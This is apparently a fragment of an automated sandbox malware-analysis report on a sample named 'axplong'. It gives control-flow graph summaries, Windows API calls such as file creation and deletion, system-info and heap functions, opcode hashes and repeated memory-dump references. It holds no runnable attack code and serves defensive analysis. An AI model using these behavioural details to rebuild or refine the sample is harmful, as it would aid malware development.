                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File__dosmaperr$HandleInformationType
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2531987475-0
                                                                                                                                                                                                                                          • Opcode ID: 0138e01a1888266fbfca459b080ef4c02a3d3a86cf6726108eac3887b3186271
                                                                                                                                                                                                                                          • Instruction ID: 9e93f68979ba8bef4eb3dac3a696415ed470e2975fed547982dfefa2923da566
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0138e01a1888266fbfca459b080ef4c02a3d3a86cf6726108eac3887b3186271
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA414B76900748ABDB24DFA5D845ABBB7F9EF89300B10482DF656D3610EB30A855CB20

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1574 9f6c79-9f6c85 1575 9f6c87-9f6ca3 call 9f7410 call 9f7423 call 9f6b6a 1574->1575 1576 9f6ca4-9f6cc8 call 9f4000 1574->1576 1581 9f6cca-9f6ce4 call 9f7410 call 9f7423 call 9f6b6a 1576->1581 1582 9f6ce6-9f6d08 CreateFileW 1576->1582 1606 9f6d52-9f6d56 1581->1606 1585 9f6d0a-9f6d0e call 9f6de1 1582->1585 1586 9f6d18-9f6d1f call 9f6d57 1582->1586 1595 9f6d13-9f6d16 1585->1595 1596 9f6d20-9f6d22 1586->1596 1595->1596 1598 9f6d44-9f6d47 1596->1598 1599 9f6d24-9f6d41 call 9f4000 1596->1599 1602 9f6d49-9f6d4f FindCloseChangeNotification 1598->1602 1603 9f6d50 1598->1603 1599->1598 1602->1603 1603->1606
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: deeeb6e7a1beaa5f57f082740de0d878b0d44b9865f01cc6208beb7600763702
                                                                                                                                                                                                                                          • Instruction ID: d23f5977470ce66ec8500931c64285a4eaba87eff6c6cf43234fdde8bb02f5bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: deeeb6e7a1beaa5f57f082740de0d878b0d44b9865f01cc6208beb7600763702
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2521B672A0520C6AEB117BA4AC42BBE776D9F81378F200354FB646B1E1DB709D0597A1

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1607 9fb4f5-9fb505 DeleteFileW 1608 9fb519-9fb51c 1607->1608 1609 9fb507-9fb518 call 9f73ed 1607->1609
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,009F69A7,?), ref: 009FB4FD
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 009FB50E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeleteFile__dosmaperr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1911827773-0
                                                                                                                                                                                                                                          • Opcode ID: 9237ddba790679c931f6b04a756bc6ee0d40e31e4ed1496891922eceb43bf352
                                                                                                                                                                                                                                          • Instruction ID: a22110eb7cf2905e4cefdc1421b0087b1e3ba9bb8b1c2ab744e2d1e77bd4d841
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9237ddba790679c931f6b04a756bc6ee0d40e31e4ed1496891922eceb43bf352
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFD0123229910C36AE1435F5AC0982A77CD4A827787241621B93C855E0EE66D8515591

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1671 9c8290-9c8311 call 9f4000 1675 9c831d-9c8345 call 9d7840 call 9c5b00 1671->1675 1676 9c8313-9c8318 1671->1676 1684 9c8349-9c836b call 9d7840 call 9c5b00 1675->1684 1685 9c8347 1675->1685 1677 9c845f-9c847b call 9dcef4 1676->1677 1690 9c836d 1684->1690 1691 9c836f-9c8388 1684->1691 1685->1684 1690->1691 1694 9c83b9-9c83e4 1691->1694 1695 9c838a-9c8399 1691->1695 1696 9c83e6-9c83f5 1694->1696 1697 9c8411-9c8432 1694->1697 1698 9c83af-9c83b6 call 9dd569 1695->1698 1699 9c839b-9c83a9 1695->1699 1700 9c8407-9c840e call 9dd569 1696->1700 1701 9c83f7-9c8405 1696->1701 1702 9c8438-9c843d 1697->1702 1703 9c8434-9c8436 GetNativeSystemInfo 1697->1703 1698->1694 1699->1698 1704 9c847c-9c8481 call 9f6b7a 1699->1704 1700->1697 1701->1700 1701->1704 1708 9c843e-9c8445 1702->1708 1703->1708 1708->1677 1713 9c8447-9c844f 1708->1713 1714 9c8458-9c845b 1713->1714 1715 9c8451-9c8456 1713->1715 1714->1677 1716 9c845d 1714->1716 1715->1677 1716->1677
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?), ref: 009C8434
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoNativeSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1721193555-0
                                                                                                                                                                                                                                          • Opcode ID: f49d18a0ffed18f4c7a13286259f386d4d698a55ccfbda1c1d6071b3feb7608b
                                                                                                                                                                                                                                          • Instruction ID: d9cc7c1cf5fdb5df2e9c843815296e5c4969c1a96326d4f2e1240250f4fb5c3c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f49d18a0ffed18f4c7a13286259f386d4d698a55ccfbda1c1d6071b3feb7608b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07513970D042599BDB18EB68DD49BEEB775EB85300F9042ADE804A73D1EF345E808B92

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1717 9f6f51-9f6f67 1718 9f6f69-9f6f6d 1717->1718 1719 9f6f77-9f6f87 1717->1719 1718->1719 1720 9f6f6f-9f6f75 1718->1720 1723 9f6f89-9f6f9b SystemTimeToTzSpecificLocalTime 1719->1723 1724 9f6fc7-9f6fca 1719->1724 1722 9f6fcc-9f6fd7 call 9dcef4 1720->1722 1723->1724 1726 9f6f9d-9f6fbd call 9f6fd8 1723->1726 1724->1722 1729 9f6fc2-9f6fc5 1726->1729 1729->1722
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 009F6F93
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$LocalSpecificSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2574697306-0
                                                                                                                                                                                                                                          • Opcode ID: c25a7264b54201049d8996e1aca8084cf0f715a0d142157b43bb62d5b5b6981d
                                                                                                                                                                                                                                          • Instruction ID: f8f8f54cd2c9e47cffafe97708618077ac5dcc52734ca998d2405c29d2ea9af2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c25a7264b54201049d8996e1aca8084cf0f715a0d142157b43bb62d5b5b6981d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D511F1B290020DABDB10DE95D944EEF77FCAF48310F505266E611E6190E734EF49CB61

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1730 9faeeb-9faef7 1731 9faf29-9faf34 call 9f7423 1730->1731 1732 9faef9-9faefb 1730->1732 1739 9faf36-9faf38 1731->1739 1733 9faefd-9faefe 1732->1733 1734 9faf14-9faf25 RtlAllocateHeap 1732->1734 1733->1734 1736 9faf27 1734->1736 1737 9faf00-9faf07 call 9f9c61 1734->1737 1736->1739 1737->1731 1742 9faf09-9faf12 call 9f8cd9 1737->1742 1742->1731 1742->1734
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,8CEBFFE3,?,?,009DD302,8CEBFFE3,?,009D78CB,?,?,?,?,?,?,009C7415,?), ref: 009FAF1D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: 25545364ce2cf3dffbda131e05c25a860290f11041d47bd4e8a9aa6d007d2f06
                                                                                                                                                                                                                                          • Instruction ID: 5e7f9c669916328e3fe18a436fc8cf16737b628c48a3064b94afc96876f25110
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25545364ce2cf3dffbda131e05c25a860290f11041d47bd4e8a9aa6d007d2f06
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79E092FA10A22E6AEB3122656C41B7B76CD9F927B0F650120AF4D9F1D0DA65DC0187F3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4506657833.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_53a0000_axplong.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: af3743400e3d3301695cdeea35cadca3aab5808a0bfb64f703c9ff79dc5c7930
                                                                                                                                                                                                                                          • Instruction ID: eca6119afdac1137afc986b312135f15fb41909a497c9c9918b1c06deace7943
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af3743400e3d3301695cdeea35cadca3aab5808a0bfb64f703c9ff79dc5c7930
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 772106EB15C560BD7146C0866F68EFBA76EE1CA730330896BF807C6A02D2980E4D2132
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4506657833.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_53a0000_axplong.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e1d2cc7d10451598db696fb7e3bc77b1c5d1fc7400eaab496ea15bd038cd80bb
                                                                                                                                                                                                                                          • Instruction ID: 51d70dbfb328c23da79578f95a1e1419e721be3b6caa848873f5a4a8b179549d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1d2cc7d10451598db696fb7e3bc77b1c5d1fc7400eaab496ea15bd038cd80bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3217FFB14C250BEB246C5956B68EFB67AEE5CA730330896BF407C6902D2940E4D6131
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4506657833.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_53a0000_axplong.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2ff403a899e65805ebd8950ee2c1dcaa2bce1fd317df35162ee8715f45cfd0cd
                                                                                                                                                                                                                                          • Instruction ID: 6de424e69dbc561f63df7aacc93fe2c2b5aab32d390c1293bd3fa7c9d22a3333
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ff403a899e65805ebd8950ee2c1dcaa2bce1fd317df35162ee8715f45cfd0cd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E91119FB15D561BD7146C0866B68EFB676FE5CA730330896BF807C6E02D2980E4E2132
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4506657833.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_53a0000_axplong.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 996bb8008badb664bc2fec2ca2ba6253b470bd52757488179ae75b1fce249b42
                                                                                                                                                                                                                                          • Instruction ID: 28c30cc90d1c5552cdbf8d214499477e8dd33e32c58361e60af655089aa837a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 996bb8008badb664bc2fec2ca2ba6253b470bd52757488179ae75b1fce249b42
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6015EE715D651AC7106D0823B58EF7676FD5CA730330851BF407C6E03D2940A4D6171
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4506657833.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_53a0000_axplong.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f1ef7c7fee2eb2211868e63177ea81eecbe45ca6e576447cae339730882528b3
                                                                                                                                                                                                                                          • Instruction ID: 68c6027e52fe7449be082e93a4ce26440e4543cb1e9f517be2bbd4483687b258
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1ef7c7fee2eb2211868e63177ea81eecbe45ca6e576447cae339730882528b3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 621104F714E650AEB206C0813A68DFB6B6EE5DB230334899BF442C7A03D1980A496232
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4506657833.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_53a0000_axplong.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a6d0a255cd9f686c15c7b0e555f20855093a6a436d70b211b093a27d85238b31
                                                                                                                                                                                                                                          • Instruction ID: 470bce137b924f023ee79a90fbee8651e9f4e5bb71b0abbbecb300da22aeb776
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6d0a255cd9f686c15c7b0e555f20855093a6a436d70b211b093a27d85238b31
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7018BF705D661AC7249C0822B68EFB675FE1CA7303308A2BF407C7E03C2A40E892131
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4506657833.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_53a0000_axplong.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 639a82f013de7509fb127af3590f3fb97a2d518e9b2a9fc772515c5d3a4a144c
                                                                                                                                                                                                                                          • Instruction ID: 2be0e8d508f6f025e854833b50b9c2da8b7fa57c9aa010a4ad861fdebe044115
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 639a82f013de7509fb127af3590f3fb97a2d518e9b2a9fc772515c5d3a4a144c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0F024A306CA61AD614EE091269CEFB6A5FE19F3303304A57F047CBE03C5540A9A7175
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4506657833.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_53a0000_axplong.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 168a63984d4eb5775b2bd6fa65e52da7b8aa0820365c480eeeb7e266843be688
                                                                                                                                                                                                                                          • Instruction ID: 547ff72c641cfaac4e85f828f38ea3f398d63ddfcb4d372c387d7a82a123185e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 168a63984d4eb5775b2bd6fa65e52da7b8aa0820365c480eeeb7e266843be688
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFF0B4A709C511ACA24AD0852B5CEF65B4FE29B3313304657F047D7E4395950A992131
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4506657833.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_53a0000_axplong.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 64d96cf6494b4efd10b1cc557fd1a0de9f0103b2b0a5209a348a0e5ee04771ab
                                                                                                                                                                                                                                          • Instruction ID: 2a1963ea47756e12ef4fbf9e0c2a5d5114e533a0dd42374facc5f53fff94c4b2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64d96cf6494b4efd10b1cc557fd1a0de9f0103b2b0a5209a348a0e5ee04771ab
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42E020A709CA14AD014BF085135CEFB694FE69F23133043577403D3F0345980A993222
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
